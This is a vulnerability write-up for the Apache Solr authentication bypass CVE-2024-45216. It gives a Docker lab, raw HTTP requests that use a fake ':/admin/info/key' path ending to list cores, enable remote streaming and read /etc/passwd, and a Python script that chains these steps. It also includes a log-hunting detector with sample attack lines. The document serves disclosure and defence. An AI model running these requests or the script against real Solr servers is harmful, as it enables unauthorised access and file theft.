2024-11-06 14:10:36 +08:00
# Apache Solr Authentication Bypass Vulnerability (CVE-2024-45216)
## Vulnerability description
In October 2024 the Apache Solr project disclosed CVE-2024-45216, an authentication bypass in Apache Solr. The flaw lies in PKIAuthenticationPlugin, which is enabled automatically whenever Solr authentication is configured (it authenticates inter-node requests). A request whose URL path carries a fake ending that looks like the unauthenticated public-key endpoint (`/admin/info/key`) skips authentication, while Solr still dispatches it to the handler named by the real path in front of that ending. An unauthenticated attacker can therefore call any Solr API, including the CoreAdmin and Config APIs. The project has released fixed versions; upgrading is recommended.
References:
- https://solr.apache.org/security.html#cve-2024-45216-apache-solr-authentication-bypass-possible-using-a-fake-url-path-ending
## Affected versions
```
5.3.0 <= Apache Solr < 8.11.4
9.0.0 <= Apache Solr < 9.7.0
```
## Network mapping
```
app="APACHE-Solr"
```
## Environment setup
docker-compose.yml:
```
version: '2'
services:
  solr:
    image: vulhub/solr:8.2.0
    ports:
      - "8983:8983"
      - "5005:5005"
```
Run the following command to start an Apache Solr 8.2.0 server:
```
docker-compose up -d
```
Once the service is up, open `http://your-ip:8983` and you will see an Apache Solr instance with no authentication configured. Note that on such an instance there is nothing to bypass: every request succeeds with or without the `:/admin/info/key` ending used below, so the steps only prove that the handlers are reachable, not that CVE-2024-45216 is present. To actually observe the bypass, first enable Solr authentication (for example BasicAuthPlugin via `security.json`), which also activates PKIAuthenticationPlugin, then confirm that the same requests without the fake ending are rejected with HTTP 401 while the requests with it succeed.
## Reproduction
Bypass authentication and list the core names (the core names are the keys of `status` in the JSON response):
```
GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105160749641.png)
Trying to read a file at this point fails with `Remote Streaming is disabled`, because remote streaming is off by default:
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161407187.png)
Change the core's configuration through the Config API (also reachable via the bypass) to enable remote streaming. `demo` is the core name obtained in the previous step. This change is persisted in the core's `configoverlay.json`, so set the property back to `false` when testing is done:
```
POST /solr/demo/config:/admin/info/key HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Content-Type: application/json
Connection: close
Content-Length: 80

{"set-property":{"requestDispatcher.requestParsers.enableRemoteStreaming":true}}
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161313234.png)
Read a file, for example `/etc/passwd`, through the `debug/dump` handler with a `file:` URL as the content stream:
```
GET /solr/demo/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file:///etc/passwd HTTP/1.1
Host: your-ip:8983
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/130.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Accept-Encoding: gzip, deflate, br
Accept-Language: en,zh-CN;q=0.9,zh;q=0.8
Connection: close
```
![](images/Apache%20Solr%20认证绕过漏洞%20CVE-2024-45216/image-20241105161237958.png)
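The three steps above as one script, added here as an example and not code from the original page or from the Solr project. It assumes Solr is reachable over plain HTTP at the base URL given on the command line, that the core name comes from step 1, and that the JSON shapes match Solr 8.x/9.x defaults (`status` keys in the CoreAdmin response, `streams[].stream` in the DumpRequestHandler response). Unlike the raw requests, it also sends each probe without the fake ending so that an instance that simply has no authentication is reported as such rather than as vulnerable.

```python
"""Verification helper for CVE-2024-45216 (added example, not from the original page)."""
import json
import sys
import urllib.error
import urllib.parse
import urllib.request
from typing import Optional

# Fake path ending: PKIAuthenticationPlugin treats the request as a call to the
# unauthenticated public-key endpoint, while Solr still routes it to the
# handler named by the part in front of the colon.
FAKE_ENDING = ":/admin/info/key"


def bypass_path(path: str, query: Optional[dict] = None) -> str:
    """Append the fake ending to a Solr API path; the query string goes after it."""
    if not path.startswith("/"):
        path = "/" + path
    out = path + FAKE_ENDING
    if query:
        out += "?" + urllib.parse.urlencode(query)
    return out


def parse_core_names(body: str) -> list:
    """Core names are the keys of 'status' in the CoreAdmin STATUS response."""
    return sorted(json.loads(body).get("status", {}).keys())


def extract_stream(body: str) -> str:
    """DumpRequestHandler echoes each content stream under streams[].stream."""
    streams = json.loads(body).get("streams") or []
    return streams[0].get("stream", "") if streams else ""


def classify(status_plain: int, status_bypass: int) -> str:
    """Compare the same request with and without the fake ending."""
    if status_plain == 200:
        return "no-auth"  # endpoint already open: nothing to bypass
    if status_plain in (401, 403) and status_bypass == 200:
        return "vulnerable"
    return "not-vulnerable"


def http(base: str, path: str, body: Optional[bytes] = None):
    """Minimal GET/POST returning (status, text); HTTP errors are returned, not raised."""
    req = urllib.request.Request(base + path, data=body, method="POST" if body else "GET")
    if body:
        req.add_header("Content-Type", "application/json")
    try:
        with urllib.request.urlopen(req, timeout=10) as resp:
            return resp.status, resp.read().decode("utf-8", "replace")
    except urllib.error.HTTPError as err:
        return err.code, err.read().decode("utf-8", "replace")


def run(base: str, target_file: str = "/etc/passwd") -> dict:
    """Step 1: list cores; step 2: enable remote streaming; step 3: read a file."""
    cores_q = {"indexInfo": "false", "wt": "json"}
    plain, _ = http(base, "/solr/admin/cores?" + urllib.parse.urlencode(cores_q))
    status, body = http(base, bypass_path("/solr/admin/cores", cores_q))
    result = {"verdict": classify(plain, status), "cores": [], "file": ""}
    if status != 200:
        return result
    result["cores"] = parse_core_names(body)
    if not result["cores"]:
        return result
    core = result["cores"][0]
    # Config API: the property is persisted to configoverlay.json, revert after testing.
    payload = json.dumps({"set-property": {
        "requestDispatcher.requestParsers.enableRemoteStreaming": True}}).encode()
    http(base, bypass_path(f"/solr/{core}/config"), payload)
    status, body = http(base, bypass_path(
        f"/solr/{core}/debug/dump",
        {"param": "ContentStreams", "stream.url": "file://" + target_file}))
    if status == 200:
        result["file"] = extract_stream(body)
    return result


if __name__ == "__main__":
    base_url = sys.argv[1] if len(sys.argv) > 1 else "http://127.0.0.1:8983"
    print(json.dumps(run(base_url), indent=2))
```

Run it as `python3 check.py http://your-ip:8983`. A verdict of `no-auth` means the plain request already succeeded, which is what the lab image above gives you unless you enable authentication first; `vulnerable` means the plain request was rejected and the one with the fake ending was accepted.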
## Fix
The project has released fixed versions; affected users should upgrade to Apache Solr 8.11.4 or 9.7.0 (or later): https://solr.apache.org/downloads.html
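Until the upgrade is done, the requests shown above leave a distinctive trace in Solr's Jetty request log: a legitimate public-key fetch is exactly `/solr/admin/info/key`, whereas exploitation attempts carry `:/admin/info/key` glued to another path. The following detector is an added example, not from the original page or the Solr project. It assumes the default NCSA-style request-log layout (`client - - [timestamp] "METHOD target PROTO" status bytes`; adjust the regex if your `jetty-requestlog.xml` differs) and runs over constructed sample lines that mirror the three requests above plus two benign ones.

```python
"""Hunt for CVE-2024-45216 attempts in Solr request logs (added example)."""
import re
from urllib.parse import parse_qs, unquote

FAKE_ENDING = ":/admin/info/key"

# Default Jetty NCSA request-log layout (assumption; check jetty-requestlog.xml).
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<target>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+)'
)

# Constructed sample lines: three exploitation steps, one legitimate key fetch,
# one ordinary query whose q parameter happens to contain a colon.
SAMPLE_LOG = """\
10.0.0.5 - - [05/Nov/2024:16:07:49 +0800] "GET /solr/admin/cores:/admin/info/key?indexInfo=false&wt=json HTTP/1.1" 200 312
10.0.0.5 - - [05/Nov/2024:16:12:37 +0800] "POST /solr/demo/config:/admin/info/key HTTP/1.1" 200 88
10.0.0.5 - - [05/Nov/2024:16:13:13 +0800] "GET /solr/demo/debug/dump:/admin/info/key?param=ContentStreams&stream.url=file%3A///etc/passwd HTTP/1.1" 200 2045
10.0.0.8 - - [05/Nov/2024:16:14:01 +0800] "GET /solr/admin/info/key HTTP/1.1" 200 512
10.0.0.9 - - [05/Nov/2024:16:15:20 +0800] "GET /solr/demo/select?q=*:*&wt=json HTTP/1.1" 401 0
"""


def parse_log_line(line: str):
    """Return the request fields as a dict, or None for lines that do not match."""
    m = LOG_RE.match(line)
    if not m:
        return None
    rec = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def indicators(target: str) -> list:
    """Indicators in a request target: the fake path ending, and a file: stream.url."""
    path, _, query = target.partition("?")
    reasons = []
    # Normalise percent-encoding so an encoded colon is not missed; a genuine
    # key fetch has no colon in front of /admin/info/key.
    if FAKE_ENDING in unquote(path):
        reasons.append("fake-path-ending")
    # parse_qs decodes values, so file%3A and file: are handled alike.
    for url in parse_qs(query).get("stream.url", []):
        if url.lower().startswith("file:"):
            reasons.append("remote-stream-local-file")
    return reasons


def detect(lines) -> list:
    """Return one finding per request that carries at least one indicator."""
    findings = []
    for line in lines:
        rec = parse_log_line(line)
        if rec is None:
            continue
        reasons = indicators(rec["target"])
        if reasons:
            findings.append({"ip": rec["ip"], "ts": rec["ts"], "method": rec["method"],
                             "status": rec["status"], "target": rec["target"],
                             "reasons": reasons})
    return findings


if __name__ == "__main__":
    for f in detect(SAMPLE_LOG.splitlines()):
        print(f["ts"], f["ip"], f["method"], f["status"], ",".join(f["reasons"]), f["target"])
```

A 200 on a request flagged `fake-path-ending` from an instance that has authentication enabled is the strongest signal; the `remote-stream-local-file` indicator on its own only shows that remote streaming is in use, which is the post-bypass step rather than the bypass itself.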